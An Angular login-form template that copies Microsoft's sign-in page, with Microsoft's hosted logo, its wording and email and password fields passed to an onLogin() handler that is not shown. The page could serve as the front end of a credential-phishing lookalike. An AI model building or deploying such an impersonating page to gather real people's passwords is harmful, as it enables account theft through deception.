<div class="login-container">
    <div class="login-box">
      <img
        src="https://aadcdn.msauthimages.net/c1c6b6c8-quchdox4alzms566-zac4cbcthjnsmocvajdsiieufs/logintenantbranding/0/bannerlogo?ts=637426159367299183"
        alt="Microsoft Logo"
        class="logo"
      />
  
      <h2>Sign in</h2>
  
      <form (ngSubmit)="onLogin()" #loginForm="ngForm">
        <input
          type="email"
          name="email"
          required
          [(ngModel)]="email"
          placeholder="Email, phone, or Skype"
        />

        <input
        type="password"
        name="password"
        [(ngModel)]="password"
        required
        placeholder="Password"
      />
  
        <button type="submit" [disabled]="!loginForm.valid">Next</button>
      </form>
  
      <div class="links">
        <a href="#">Can't access your account?</a>
        <a href="#">Sign-in options</a>
      </div>
    </div>
  </div>
  